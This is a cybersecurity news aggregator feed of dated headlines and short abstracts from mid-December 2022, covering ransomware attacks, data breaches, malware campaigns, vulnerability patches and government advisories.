Conti Team One Splinter Group Resurfaces as Royal Ransomware with Callback Phishing Attacks Full Text
Abstract
The threat actors running the ransomware — who used to be a part of Conti Team One, according to a mind map shared by Vitali Kremez — initially dubbed it Zeon ransomware, until they rebranded it to Royal ransomware.Cyware
December 21, 2022 – Breach
Shoemaker Ecco leaks over 60GB of sensitive data for 500+ days Full Text
Abstract
CyberNews researchers reported that Ecco, a global shoe manufacturer and retailer, exposed millions of documents. Original post @ https://cybernews.com/security/ecco-leaks-sensitive-data-for-months/ Ecco, a global shoe manufacturer and retailer,...Security Affairs
December 21, 2022 – Government
FBI warns of search engine ads pushing malware, phishing Full Text
Abstract
The FBI warns that threat actors are using search engine advertisements to promote websites distributing ransomware or stealing login credentials for financial institutions and crypto exchanges.BleepingComputer
December 21, 2022 – General
5 cybersecurity trends accelerating in 2023 Full Text
Abstract
The return of malware strains like Emotet, Conti, and Trickbot indicates an expansion of cybercrime for hire. Modern organizations rely on complex supply chains, including SMBs and MSPs.Cyware
December 21, 2022 – Attack
German industrial giant ThyssenKrupp targeted in a new cyberattack Full Text
Abstract
German multinational industrial engineering and steel production company ThyssenKrupp AG was the target of a cyberattack. German multinational industrial engineering and steel production giant ThyssenKrupp AG announced that the Materials Services...Security Affairs
December 21, 2022 – Malware
GodFather Android malware targets 400 banks, crypto exchanges Full Text
Abstract
An Android banking malware named 'Godfather' has been targeting users in 16 countries, attempting to steal account credentials for over 400 online banking sites and cryptocurrency exchanges.BleepingComputer
December 21, 2022 – Criminals
Russian Killnet Hacker Group Claims Data Theft of 10,000 FBI Agents Full Text
Abstract
The Russian hacker group, KillNet, claims to have infiltrated an FBI database, allegedly stealing the personal information of more than 10,000 US federal agents. Like their other attacks, this alleged hack also appears to have political undertones.Cyware
December 21, 2022 – Breach
Okta’s source code stolen after GitHub repositories hacked Full Text
Abstract
In a 'confidential' email notification sent by Okta and seen by BleepingComputer, the company states that attackers gained access to its GitHub repositories this month and stole the company's source code.BleepingComputer
December 21, 2022 – Vulnerabilities
Critical Vulnerability in Hikvision Wireless Bridges Allows CCTV Hacking Full Text
Abstract
Chinese video surveillance company Hikvision has patched a critical vulnerability in some of its wireless bridge products. The flaw can lead to remote CCTV hacking, according to the researchers who found it.Cyware
December 21, 2022 – Breach
Antwerp denies negotiating ransomware payment as city disappears from leak site Full Text
Abstract
A listing for the City of Antwerp was removed from the PLAY ransomware group’s leak site this weekend, despite its mayor announcing that the municipality did not pay the gang to unlock its data.Cyware
December 21, 2022 – Attack
German Steel Production Giant ThyssenKrupp Targeted in a New Cyberattack Full Text
Abstract
At the time of reporting, the company is yet to disclose the type of attack that hit its systems and no cybercriminal group has yet claimed responsibility for the attack.Cyware
December 20, 2022 – Criminals
Ransomware gang uses new Microsoft Exchange exploit to breach servers Full Text
Abstract
Play ransomware threat actors are using a new exploit chain that bypasses ProxyNotShell URL rewrite mitigations to gain remote code execution (RCE) on vulnerable servers through Outlook Web Access (OWA).BleepingComputer
December 20, 2022 – Malware
Newly Identified RisePro Malware is a Spin-off of Vidar Stealer Full Text
Abstract
RisePro stealer malware has been found targeting sensitive information on infected systems and harvesting data in the form of logs. It may have been dropped or downloaded by the pay-per-install malware downloader service PrivateLoader, finds Flashpoint. The malware first appeared on a Russian forum...Cyware
December 20, 2022 – APT
UAC-0142 APT targets Ukraine’s Delta military intelligence program Full Text
Abstract
Ukraine’s CERT-UA revealed the national Delta military intelligence program has been targeted with a malware-based attack. On December 17, 2022, the Center for Innovations and Development of Defense Technologies of the Ministry of Defense of Ukraine...Security Affairs
December 20, 2022 – Solution
VirusTotal cheat sheet makes it easy to search for specific results Full Text
Abstract
VirusTotal has published a cheat sheet to help researchers create queries leading to more specific results from the malware intelligence platform.BleepingComputer
December 20, 2022 – Hacker
Russian hackers targeted petroleum refining company in NATO state Full Text
Abstract
A hacking group associated with Russia’s Federal Security Service (FSB) unsuccessfully attempted to compromise a large petroleum refining company within a NATO member state at the end of August, according to a new report.Cyware
December 20, 2022 – APT
Russia-linked Gamaredon APT targeted a petroleum refining company in a NATO nation in August Full Text
Abstract
Russia-linked Gamaredon APT group targeted a large petroleum refining company in a NATO state this year amid the invasion of Ukraine. The Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident...Security Affairs
December 20, 2022 – General
Microsoft will turn off Exchange Online basic auth in January Full Text
Abstract
Microsoft warned today that it will permanently turn off Exchange Online basic authentication starting early January 2023 to improve security.BleepingComputer
December 20, 2022 – Criminals
Infamous hacker steals 14 BAYCs worth over $1 million Full Text
Abstract
According to @serpent, the hacker contacted the victim and asked to license IP rights for BAYC #2060. They claimed to be a casting director for Forte Pictures, an L.A.-based Emmy Award-winning company. The alias the scammer used was fake.Cyware
December 20, 2022 – Vulnerabilities
Microsoft shares details for a Gatekeeper Bypass bug in Apple macOS Full Text
Abstract
Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper. Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score:...Security Affairs
December 20, 2022 – Criminals
Google Ad fraud campaign used adult content to make millions Full Text
Abstract
A massive advertising fraud campaign using Google Ads and 'popunders' on adult sites is estimated to have generated millions of ad impressions on stolen articles, making the fraudsters an estimated $275k per month.BleepingComputer
December 20, 2022 – General
Connected homes are expanding, so is attack volume Full Text
Abstract
78% of Americans report unsafe online behaviors that open them up to cyber threats, such as reusing or sharing passwords, skipping software updates and more – a 14% increase from just two years ago, according to Comcast.Cyware
December 20, 2022 – Attack
Hackers bombard PyPi platform with information-stealing malware Full Text
Abstract
The PyPI Python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers' data.BleepingComputer
December 20, 2022 – Attack
Attack Campaign Spreads Raspberry Robin Malware Across Europe, South America, and Oceania Full Text
Abstract
The group behind Raspberry Robin appears to be testing the waters to see how far its deployments can spread. The majority of the group’s victims are either government agencies or telecommunication entities from South America, Europe, and Oceania.Cyware
December 20, 2022 – Malware
Raspberry Robin worm drops fake malware to confuse researchers Full Text
Abstract
The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it's being run within sandboxes and debugging tools.BleepingComputer
December 20, 2022 – Government
Cyber Command conducted offensive operations to protect midterm elections Full Text
Abstract
U.S. Cyber Command conducted both defensive and offensive operations to thwart foreign actors from interfering in the 2022 midterms, according to the digital combat unit’s chief.Cyware
December 20, 2022 – Botnet
Glupteba Botnet Rises from the Dead Full Text
Abstract
Experts at Nozomi Networks announced that they spotted an ongoing Glupteba botnet campaign, starting June 2022. Just a year ago, Google had claimed to dismantle the botnet’s infrastructure. Glupteba operators used the Bitcoin blockchain for hiding C&C domains, making it resilient to takedown ef...Cyware
December 20, 2022 – Breach
Little Rock School District approves $250K payment in ransomware settlement Full Text
Abstract
While trying to retrieve stolen data from its network, the Little Rock School District’s board voted 6-3 on December 5 to approve a $250,000 settlement that would end a recent ransomware incident.Cyware
December 20, 2022 – Phishing
DarkTortilla Masquerades Grammarly, Cisco For Phishing Attacks Full Text
Abstract
Security analysts at Cyble observed two phishing sites imitating Grammarly and Cisco to distribute the DarkTortilla malware. The malware is capable of adding more RAT and stealer payloads, such as AgentTesla, AsyncRAT, NanoCore, and others to an infected system. The complex .NET-based malware has b...Cyware
December 20, 2022 – Malware
Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware Full Text
Abstract
Researchers spotted a malicious package in the Python Package Index (PyPI) repository that impersonates a software development kit (SDK) for SentinelOne. Cybersecurity researchers at ReversingLabs have discovered a new malicious package, named 'SentinelOne,'...Security Affairs
December 19, 2022 – Attack
Play ransomware claims attack on German hotel chain H-Hotels Full Text
Abstract
The Play ransomware gang has claimed responsibility for a cyber attack on H-Hotels (h-hotels.com) that has resulted in communication outages for the company.BleepingComputer
December 19, 2022 – Ransomware
How Reveton Ransomware-as-a-Service Changed Cybersecurity Full Text
Abstract
In 2012, Reveton ransomware emerged. It’s considered to be the first Ransomware-as-a-Service (RaaS) operation ever. Since then, RaaS has enabled gangs with basic technical skills to launch attacks indiscriminately.Cyware
December 19, 2022 – Vulnerabilities
Microsoft finds macOS bug that lets malware bypass security checks Full Text
Abstract
Apple has fixed a vulnerability that could be leveraged to deploy malware on vulnerable macOS devices via untrusted applications capable of bypassing Gatekeeper application execution restrictions.BleepingComputer
December 19, 2022 – Vulnerabilities
Cisco Warns of Many Old Vulnerabilities Being Exploited in Attacks Full Text
Abstract
Five of the updated advisories resolve critical-severity vulnerabilities that could allow remote attackers to execute arbitrary code (RCE), cause a denial-of-service (DoS) condition, or execute arbitrary commands.Cyware
December 19, 2022 – Vulnerabilities
Old vulnerabilities in Cisco products actively exploited in the wild Full Text
Abstract
IT giant Cisco is warning of threat actors exploiting many old vulnerabilities in attacks in the wild. Cisco has updated multiple security advisories to warn of the active exploitation of several old vulnerabilities impacting its products. The...Security Affairs
December 19, 2022 – Breach
DraftKings warns data of 67K people was exposed in account hacks Full Text
Abstract
Sports betting company DraftKings revealed last week that more than 67,000 customers had their personal information exposed following a credential attack in November.BleepingComputer
December 19, 2022 – Government
US Puts 3 Dozen More Chinese Companies on Trade Blacklist Full Text
Abstract
The U.S. Department of Commerce is adding 36 Chinese high-tech companies, including makers of aviation equipment, chemicals, and computer chips, to an export controls blacklist, citing concerns over national security, U.S. interests and human rights.Cyware
December 19, 2022 – Ransomware
Experts spotted a variant of the Agenda Ransomware written in Rust Full Text
Abstract
Researchers spotted a new variant of the Agenda ransomware which is written in the cross-platform programming language Rust. Trend Micro researchers have spotted a new variant of the Agenda ransomware (aka Qilin) that is written in Rust Language....Security Affairs
December 19, 2022 – Attack
Ukraine’s DELTA military system users targeted by info-stealing malware Full Text
Abstract
A compromised Ukrainian Ministry of Defense email account was found sending phishing emails and instant messages to users of the 'DELTA' situational awareness program to infect systems with information-stealing malware.BleepingComputer
December 19, 2022 – Phishing
Highly Sophisticated DarkTortilla Malware Spreads via Phishing Sites Disguising as Cisco and Grammarly Full Text
Abstract
Security researchers described how DarkTortilla spreads to users through spam emails with malicious attachments. However, CRIL discovered that the threat actors responsible for DarkTortilla had built phishing websites to spread the malware.Cyware
December 19, 2022 – Government
US Gov warns of BEC attacks to hijack shipments of food products Full Text
Abstract
The US government is warning of business email compromise (BEC) attacks aimed at hijacking shipments of food products and ingredients. The Federal Bureau of Investigation (FBI), the Food and Drug Administration Office of Criminal Investigations (FDA OCI),...Security Affairs
December 19, 2022 – Malware
Malicious ‘SentinelOne’ PyPI package steals data from developers Full Text
Abstract
Threat actors have published a malicious Python package on PyPI, named 'SentinelOne,' that pretends to be the legitimate SDK client for the trusted American cybersecurity firm but, in reality, steals data from developers.BleepingComputer
December 19, 2022 – Attack
Qakbot Attackers Manipulate SVG Files in HTML Smuggling Attack Full Text
Abstract
Phishing campaigns involving QBot malware as payload have started using a new technique. Hackers are using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows systems. This particular activity allows them to stay under the radar and bypass security tools that...Cyware
December 19, 2022 – Botnet
Glupteba botnet is back after Google disrupted it in December 2021 Full Text
Abstract
The Glupteba botnet is back; researchers reported a surge in infections worldwide after Google disrupted its operation in 2021. In December 2021, Google announced it had taken down the infrastructure operated by the Glupteba botnet; it also sued...Security Affairs
December 19, 2022 – Solution
UID smuggling: A new technique for tracking users online Full Text
Abstract
A group of researchers at UC San Diego have for the first time sought to quantify the frequency of UID smuggling in the wild, by developing a measurement tool called CrumbCruncher.Cyware
December 19, 2022 – Botnet
Glupteba botnet is back after Google disrupted it in December 2021 Full Text
Abstract
The blockchain-enabled botnet has been active since at least 2011; researchers estimated that the Glupteba botnet was composed of more than 1 million Windows PCs around the world as of December 2021.Cyware
December 19, 2022 – General
85% of attacks now use encrypted channels Full Text
Abstract
Malware continues to pose the greatest threat to individuals and businesses across nine key industries, with manufacturing, education and healthcare being the most commonly targeted, according to Zscaler.Cyware
December 18, 2022 – Breach
Restaurant CRM platform ‘SevenRooms’ confirms breach after data for sale Full Text
Abstract
Restaurant customer management platform SevenRooms has confirmed it suffered a data breach after a threat actor began selling stolen data on a hacking forum. SevenRooms, a restaurant CRM software and guest management service provider, has admitted it has suffered a data breach as the result of a security incident at one of its vendors.BleepingComputer
December 18, 2022 – General
Security Affairs newsletter Round 398 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs, free for you in your email box. If you also want to receive the free newsletter with the international press, subscribe here. Samba...Security Affairs
December 18, 2022 – Policy and Law
T-Mobile hacker gets 10 years for $25 million phone unlock scheme Full Text
Abstract
Argishti Khudaverdyan, the former owner of a T-Mobile retail store, was sentenced to 10 years in prison for a $25 million scheme where he unlocked and unblocked cellphones by hacking into T-Mobile's internal systems.BleepingComputer
December 18, 2022 – Solution
Google announced end-to-end encryption for Gmail web Full Text
Abstract
Google introduces end-to-end encryption for Gmail web to its Workspace and education customers to protect emails sent using the web client. Google announced end-to-end encryption (E2EE) for Gmail; with the Gmail client-side encryption beta, users can send...Security Affairs
December 18, 2022 – Attack
Fire and rescue service in Victoria, Australia, confirms cyber attack Full Text
Abstract
The fire and rescue service in the state of Victoria, Australia, has shut down its network and turned to operating manually after a cyberattack. The fire and rescue service in the state of Victoria (FRV), Australia, has shut down its network after...Security Affairs
December 17, 2022 – Malware
Glupteba malware is back in action after Google disruption Full Text
Abstract
The Glupteba malware botnet has sprung back into action, infecting devices worldwide after its operation was disrupted by Google almost a year ago.BleepingComputer
December 17, 2022 – Solution
Google introduces end-to-end encryption for Gmail on the web Full Text
Abstract
Google announced on Friday that it's adding end-to-end encryption to Gmail on the web, allowing enrolled Google Workspace users to send and receive encrypted emails within their domain and outside their domain.BleepingComputer
December 17, 2022 – Vulnerabilities
Samba addressed multiple high-severity vulnerabilities Full Text
Abstract
Samba released updates to address multiple vulnerabilities that can be exploited to take control of impacted systems. Samba released updates to address multiple vulnerabilities, tracked as CVE-2022-38023, CVE-2022-37966, CVE-2022-37967, and CVE-2022-45141,...Security Affairs
December 16, 2022 – General
Want to Know What’s in That Online Mystery Box? NOTHING AT ALL Full Text
Abstract
Shoppers have been flocking to sites selling return pallets looking for great deals on holiday purchases. And as you might expect, scammers and bad actors have also seized on this trend.Cyware
December 16, 2022 – Ransomware
Agenda Ransomware Uses Rust to Target More Vital Industries Full Text
Abstract
The new Rust-based variant of Agenda ransomware has also been seen using intermittent encryption, one of the emerging tactics that threat actors use today for faster encryption and detection evasion.Cyware
December 16, 2022 – Business
Meta takes down surveillance-for-hire firms, calls for government action against the industry Full Text
Abstract
Meta revealed its latest actions in a report released Thursday that was accompanied by a policy paper offering 13 recommendations for confronting the surveillance-for-hire industry.Cyware
December 16, 2022 – Vulnerabilities
Critical IP spoofing bug patched in Cacti Full Text
Abstract
The vulnerability resides in a PHP file in Cacti that allows remote agents to run different actions on the server. The only safeguard this file offered was to check whether requests were coming from an authorized IP address.Cyware
December 16, 2022 – Ransomware
The Week in Ransomware - December 16th 2022 - Losing Trust Full Text
Abstract
Today's Week in Ransomware brings you the latest news and stories about the cyberattacks, new tactics, and reports related to ransomware operations.BleepingComputer
December 16, 2022 – Policy and Law
Former Twitter employee sentenced to 3.5 years in jail for spying on behalf of Saudi Arabia Full Text
Abstract
A former Twitter employee has been sentenced to three-and-a-half years in prison for spying on individuals on behalf of Saudi Arabia. In August 2022, the former Twitter employee, Ahmad Abouammo (44), was found guilty of gathering private information...Security Affairs
December 16, 2022 – Attack
Colombian energy supplier EPM hit by BlackCat ransomware attack Full Text
Abstract
Colombian energy company Empresas Públicas de Medellín (EPM) suffered a BlackCat/ALPHV ransomware attack on Monday, disrupting the company's operations and taking down online services.BleepingComputer
December 16, 2022 – Breach
Social Blade discloses security breach Full Text
Abstract
Social media analytics service Social Blade disclosed a security breach after a database containing allegedly stolen data from the company was offered for sale. Social Blade is an American social media analytics platform; the company disclosed...Security Affairs
December 16, 2022 – Government
FBI warns that BEC attacks now also target food shipments Full Text
Abstract
Organizations in the food sector are now also targeted in business email compromise (BEC) attacks, according to a joint advisory issued by the FBI, the Food and Drug Administration Office of Criminal Investigations (FDA OCI), and the U.S. Department of Agriculture (USDA).BleepingComputer
December 16, 2022 – Breach
Data of 5.7M Gemini users available for sale on hacking forums Full Text
Abstract
Gemini crypto exchange warns users of an ongoing phishing campaign after a third-party vendor suffered a security breach. Gemini crypto exchange is warning of phishing campaigns targeting its users after a threat actor obtained their data by breaching...Security Affairs
December 16, 2022 – Policy and Law
Woman gets 66 months in prison for role in $3.3 million ID fraud op Full Text
Abstract
The Australian Federal Police (AFP) have announced today that a 24-year-old woman from Melbourne, arrested in 2019 for her role in large-scale, cyber-enabled identity theft crimes, was sentenced to five years and six months in prison.BleepingComputer
December 16, 2022 – Government
CISA adds Veeam Backup and Replication bugs to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added two vulnerabilities impacting Veeam Backup & Replication software to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two vulnerabilities impacting Veeam Backup...Security Affairs
December 16, 2022 – Denial Of Service
Microsoft warns of new Minecraft DDoS malware infecting Windows, Linux Full Text
Abstract
A new cross-platform malware botnet named 'MCCrash' is infecting Windows, Linux, and IoT devices to conduct distributed denial of service attacks on Minecraft servers.BleepingComputer
December 16, 2022 – Botnet
MCCrash botnet targets private Minecraft servers, Microsoft warns Full Text
Abstract
Microsoft announced that a botnet dubbed MCCrash is launching distributed denial-of-service (DDoS) attacks against private Minecraft servers. Microsoft spotted a cross-platform botnet, tracked as MCCrash, which has been designed to launch distributed...Security Affairs
December 16, 2022 – Vulnerabilities
Microsoft revised CVE-2022-37958 severity due to its broader scope Full Text
Abstract
Microsoft revised the severity rating for the CVE-2022-37958 flaw, which was addressed with the Patch Tuesday security updates for September 2022. Microsoft revised the severity rating for the CVE-2022-37958 vulnerability; the IT giant now rates it as "critical"...Security Affairs
December 15, 2022 – Outage
FuboTV says World Cup streaming outage caused by a cyberattack Full Text
Abstract
FuboTV has confirmed that a streaming outage preventing subscribers from watching the World Cup Qatar 2022 semifinal match between France and Morocco was caused by a cyberattack.BleepingComputer
December 15, 2022 – Government
HHS Issues an Alert on LockBit 3.0 Attacks Full Text
Abstract
The HHS warned healthcare and public health sector organizations against the rising number of LockBit 3.0 ransomware attacks, along with other ransomware and triple-extortion. The frequent attack vectors associated with ransomware are phishing, Remote Desktop Protocol (RDP), credentials, and kn...Cyware
December 15, 2022 – Breach
Hackers leak personal info allegedly stolen from 5.7M Gemini users Full Text
Abstract
Gemini crypto exchange announced this week that customers were targeted in phishing campaigns after a threat actor collected their personal information from a third-party vendor.BleepingComputer
December 15, 2022 – Phishing
Laying Bare Charming Kitten’s Massive Campaign Full Text
Abstract
New phishing techniques by APT42, or Charming Kitten, have come to light that includes compromised accounts, malware, and confrontational lures. The researchers observed at least 60 campaigns this year, which relied on benign conversations to initiate contact with targets.Cyware
December 15, 2022 – APT
Chinese MirrorFace APT group targets Japanese political entities Full Text
Abstract
A Chinese-speaking APT group, tracked as MirrorFace, is behind a spear-phishing campaign targeting Japanese political entities. ESET researchers recently discovered a spear-phishing campaign targeting Japanese political entities and attributed it to the Chinese-speaking...Security Affairs
December 15, 2022 – General
GitHub to require all users to enable 2FA by the end of 2023 Full Text
Abstract
GitHub will require all users who contribute code on the platform to enable two-factor authentication (2FA) as an additional protection measure on their accounts by the end of 2023.BleepingComputer
December 15, 2022 – Malware
Hackers Use Microsoft-Signed Malicious Windows Drivers in Post-Exploitation Activity Full Text
Abstract
Microsoft revoked several hardware developer accounts after drivers signed through those profiles were leveraged by hackers in attacks, including ransomware incidents. Sophos revealed that Cuba ransomware operators used the BURNTCIGAR loader utility to install a malicious driver signed using Micros...Cyware
December 15, 2022 – Breach
Database of the FBI’s InfraGard US Critical Infrastructure Intelligence portal available for sale Full Text
Abstract
The portal of the FBI's InfraGard US Critical Infrastructure Intelligence was hacked, and data is available for sale on a cybercrime forum. InfraGard is a partnership between the Federal Bureau of Investigation (FBI) and members of the private sector...Security Affairs
December 15, 2022 – Solution
GitHub rolls out free secret scanning for all public repositories Full Text
Abstract
GitHub is rolling out support for the free scanning of exposed secrets (such as credentials and auth tokens) to all public repositories on its code hosting platform.BleepingComputer
December 15, 2022 – Phishing
Operation LiberalFace Targeted Japanese Political Entities Before Elections Full Text
Abstract
ESET researchers discovered a spearphishing campaign targeting Japanese political entities a few weeks before the House of Councillors elections, and in the process uncovered a previously undescribed MirrorFace credential stealer.Cyware
December 15, 2022 – Criminals
FBI seized 48 domains linked to DDoS-for-Hire service platforms Full Text
Abstract
The U.S. Department of Justice (DoJ) seized forty-eight domains that offered DDoS-for-Hire Service Platforms to crooks. The U.S. Department of Justice (DoJ) this week announced the seizure of 48 domains associated with the DDoS-for-Hire Service platforms...Security Affairs
December 15, 2022 – Phishing
Phishing attack uses Facebook posts to evade email security Full Text
Abstract
A new phishing campaign uses Facebook posts as part of its attack chain to trick users into giving away their account credentials and personally identifiable information (PII).BleepingComputer
December 15, 2022 – Botnet
GoTrim Brute Forcer Botnet Scans Internet for WordPress Sites Full Text
Abstract
FortiGuard Labs identified an ongoing, previously unseen CMS scanner and brute forcer, dubbed GoTrim, installed in infected WordPress sites on Linux systems. The botnet detects and evades anti-bot techniques used by web hosting providers and CDNs, such as Cloudflare and SiteGround. WordPr...Cyware
December 15, 2022 – Malware
Crooks use HTML smuggling to spread QBot malware via SVG files Full Text
Abstract
Talos researchers uncovered a phishing campaign distributing the QBot malware to Windows systems using SVG files. Talos researchers uncovered a phishing campaign distributing the QBot malware using a new technique that leverages Scalable Vector Graphics...Security Affairs
December 15, 2022 – Breach
Ukrainian govt networks breached via trojanized Windows 10 installers Full Text
Abstract
Ukrainian government entities were hacked in targeted attacks after their networks were first compromised via trojanized ISO files posing as legitimate Windows 10 installers.BleepingComputer
December 15, 2022 – Vulnerabilities
Mozilla Fixes Firefox Vulnerabilities That Could Have Led to System Takeover Full Text
Abstract
Multiple high-impact vulnerabilities affecting Thunderbird, Firefox ESR, and Firefox were fixed by updates from Mozilla. The bugs might have given arbitrary code execution if they were successfully exploited.Cyware
December 15, 2022 – Breach
Social Blade confirms breach after hacker posts stolen user data Full Text
Abstract
Social media analytics platform Social Blade has confirmed they suffered a data breach after its database was breached and put up for sale on a hacking forum.BleepingComputer
December 15, 2022 – Ransomware
Royal Ransomware Puts Novel Spin on Encryption Tactics Full Text
Abstract
An emerging cybercriminal group linked with Conti has expanded its partial encryption strategy and demonstrates other evasive maneuvers, as it takes aim at healthcare and other sectors.Cyware
December 15, 2022 – Denial Of Service
How Gcore uses regular expressions to block DDoS attacks Full Text
Abstract
In DDoS Protection, Gcore uses the bundle of XDP and regular expressions (regex). This article will explain why Gcore started using this solution (regex in XDP) and how they bound them via a third-party engine and API development.BleepingComputer
December 15, 2022 – Hacker
Cyber warfare group caused AIIMS hack: sources - ET CISO Full Text
Abstract
A cyber warfare group backed by a “neighbouring” nation’s government was involved in the cyberattack on servers of the All India Institute of Medical Sciences (AIIMS), two sources aware of a government probe into the breach said.Cyware
December 15, 2022 – Vulnerabilities
LEGO BrickLink bugs let hackers hijack accounts, breach servers Full Text
Abstract
Security analysts have discovered two API security vulnerabilities in BrickLink.com, LEGO Group's official second-hand and vintage marketplace for LEGO bricks.BleepingComputer
December 15, 2022 – Vulnerabilities
Siemens Fixes 80 OpenSSL, OpenSSH Flaws in Switches Full Text
Abstract
Siemens released 20 new advisories addressing roughly 140 security holes, including more than 80 OpenSSL and OpenSSH vulnerabilities affecting its Scalance X-200RNA switches.Cyware
December 15, 2022 – Hacker
Hackers target Japanese politicians with new MirrorStealer malware Full Text
Abstract
A hacking group tracked as MirrorFace has been targeting Japanese politicians for weeks before the House of Councilors election in July 2022, using a previously undocumented credentials stealer named 'MirrorStealer.'BleepingComputer
December 15, 2022 – Outage
Ransomware-hit Rackspace email outage enters 12th day Full Text
Abstract
There's no end – or restored data – in sight for some Rackspace customers now on the 12th day of the company's ransomware attack-induced hosted Exchange email service outage.Cyware
December 14, 2022 – Criminals
FBI seized domains linked to 48 DDoS-for-hire service platforms Full Text
Abstract
The US Department of Justice has seized 48 Internet domains and charged six suspects for their involvement in running 'Booter' or 'Stresser' platforms that allow anyone to easily conduct distributed denial of service attacks.BleepingComputer
December 14, 2022 – Solution
Passkeys Now Fully Supported in Google Chrome Full Text
Abstract
Passkeys offer the same experience that password autofill does, but provide the advantage of passwordless authentication, eliminating the risks associated with phishing or the use of poor passwords.Cyware
December 14, 2022 – Malware
Attackers use SVG files to smuggle QBot malware onto Windows systems Full Text
Abstract
QBot malware phishing campaigns have adopted a new distribution method using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows.BleepingComputer
December 14, 2022 – Vulnerabilities
SAP’s December 2022 Security Updates Patch Critical Vulnerabilities Full Text
Abstract
With a CVSS score of 10, the most severe of SAP’s security notes updates a note released on April 2018 Patch Day, which deals with software updates for the Chrome-based browser in SAP Business Client.Cyware
December 14, 2022 – Vulnerabilities
Microsoft patches Windows zero-day used to drop ransomware Full Text
Abstract
Microsoft has fixed a security vulnerability used by threat actors to circumvent the Windows SmartScreen security feature and deliver Magniber ransomware and Qbot malware payloads.BleepingComputer
December 14, 2022 – Breach
Nosey Parker: Find sensitive information in textual data and Git history Full Text
Abstract
Nosey Parker addresses the pervasive problem of secret exposure in source code and configuration files where sensitive information such as passwords, API keys, access tokens, asymmetric private keys, client secrets, and credentials exist.Cyware
December 14, 2022 – Vulnerabilities
VMware fixes critical ESXi and vRealize security flaws Full Text
Abstract
VMware released security updates to address a critical-severity vulnerability impacting ESXi, Workstation, Fusion, and Cloud Foundation, and a critical-severity command injection flaw affecting vRealize Network Insight.BleepingComputer
December 14, 2022 – Breach
California hospital breach exposed patients’ Social Security numbers, medical info Full Text
Abstract
A hospital in California’s Riverside County has reported a data breach to its patients including sensitive information like Social Security numbers and the details of medical care following an incident in the fall.Cyware
December 14, 2022 – Government
NSA shares tips on mitigating 5G network slicing threats Full Text
Abstract
The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Office of the Director of National Intelligence (ODNI), have published a joint report that highlights the most likely risks and potential threats in 5G network slicing implementations.BleepingComputer
December 14, 2022 – Attack
‘Crisis Situation’ Declared as Two Swedish Municipalities Hit by Cyberattack Full Text
Abstract
An intrusion has been confirmed into the joint IT system used by the two municipalities of Borgholm and Mörbylånga, which together make up the island of Öland with a total population of just over 25,000.Cyware
December 14, 2022 – Criminals
The Dark Web is Getting Darker - Ransomware Thrives on Illegal Markets Full Text
Abstract
The dark web is getting darker as cybercrime gangs increasingly shop their malware, phishing, and ransomware tools on illegal cybercrime markets.BleepingComputer
December 14, 2022 – Government
Mapping Threat Intelligence to the NIST Compliance Framework Full Text
Abstract
Using the NIST Framework, organizations assess their current security posture, agree to organizational goals, understand their gaps, and develop plans to optimize their security posture.Cyware
December 14, 2022 – Phishing
Open-source repositories flooded by 144,000 phishing packages Full Text
Abstract
Unknown threat actors have uploaded a total of 144,294 phishing-related packages on the open-source package repositories NuGet, PyPI, and NPM.BleepingComputer
December 14, 2022 – General
What CISOs consider when building up security resilience Full Text
Abstract
Resilience has emerged as a top priority as 62 percent of organizations surveyed said they had experienced a security event that impacted business in the past two years, according to Cisco.Cyware
December 14, 2022 – Breach
TPG Reveals Emails of 15,000 iiNet and Westnet Customers Exposed in Email Hack Full Text
Abstract
TPG has not said what might have been obtained in the attack, but an investigation is ongoing and affected customers will be advised. It told the ASX the breach didn't affect mobile or broadband services, and access has been cut off for the attacker.Cyware
December 14, 2022 – Botnet
GoTrim botnet actively brute forces WordPress and OpenCart sites Full Text
Abstract
Researchers discovered a new Go-based botnet, dubbed GoTrim, attempting to brute force WordPress websites. Fortinet FortiGuard Labs researchers spotted a new Go-based botnet, dubbed GoTrim, that has been spotted scanning and brute-forcing WordPress...Security Affairs
December 14, 2022 – Vulnerabilities
December 2022 Patch Tuesday fixed 2 zero-day flaws Full Text
Abstract
Microsoft released December 2022 Patch Tuesday security updates that fix 52 vulnerabilities across its products. Microsoft December 2022 Patch Tuesday security updates addressed 52 vulnerabilities in Microsoft Windows and Windows Components; Azure;...Security Affairs
December 14, 2022 – Vulnerabilities
Apple fixed the tenth actively exploited zero-day this year Full Text
Abstract
Apple rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari to fix a new actively exploited zero-day (CVE-2022-42856). Apple released security updates to address a new zero-day vulnerability, tracked as CVE-2022-42856, that is actively...Security Affairs
December 14, 2022 – General
3.5m IP cameras exposed, with US in the lead Full Text
Abstract
The number of internet-facing cameras in the world is growing exponentially. Some of the most popular brands don't enforce a strong password policy, meaning anyone can peer into their owners' lives. Original post at https://cybernews.com/security/millions-ip-cameras-exposed/ When...Security Affairs
December 14, 2022 – Vulnerabilities
VMware fixed critical VM Escape bug demonstrated at Geekpwn hacking contest Full Text
Abstract
VMware fixed three flaws in multiple products, including a virtual machine escape issue exploited at the GeekPwn 2022 hacking competition. VMware addressed three vulnerabilities in multiple products, including a virtual machine escape flaw, tracked...Security Affairs
December 13, 2022 – Malware
Microsoft-signed malicious Windows drivers used in ransomware attacks Full Text
Abstract
Microsoft has revoked several Microsoft hardware developer accounts after drivers signed through their profiles were used in cyberattacks, including ransomware incidents.BleepingComputer
December 13, 2022 – Malware
TrueBot Malware Downloader Comes with Alternative Delivery Methods Full Text
Abstract
Russian-speaking hacking group Silence dropped the TrueBot malware downloader on over 1,500 systems worldwide to deploy their set of hacking tools, including Grace malware, Cobalt Strike, Teleport, and Cl0p ransomware. Teleport is a new custom data leakage tool created by the group. It uses Truebot...Cyware
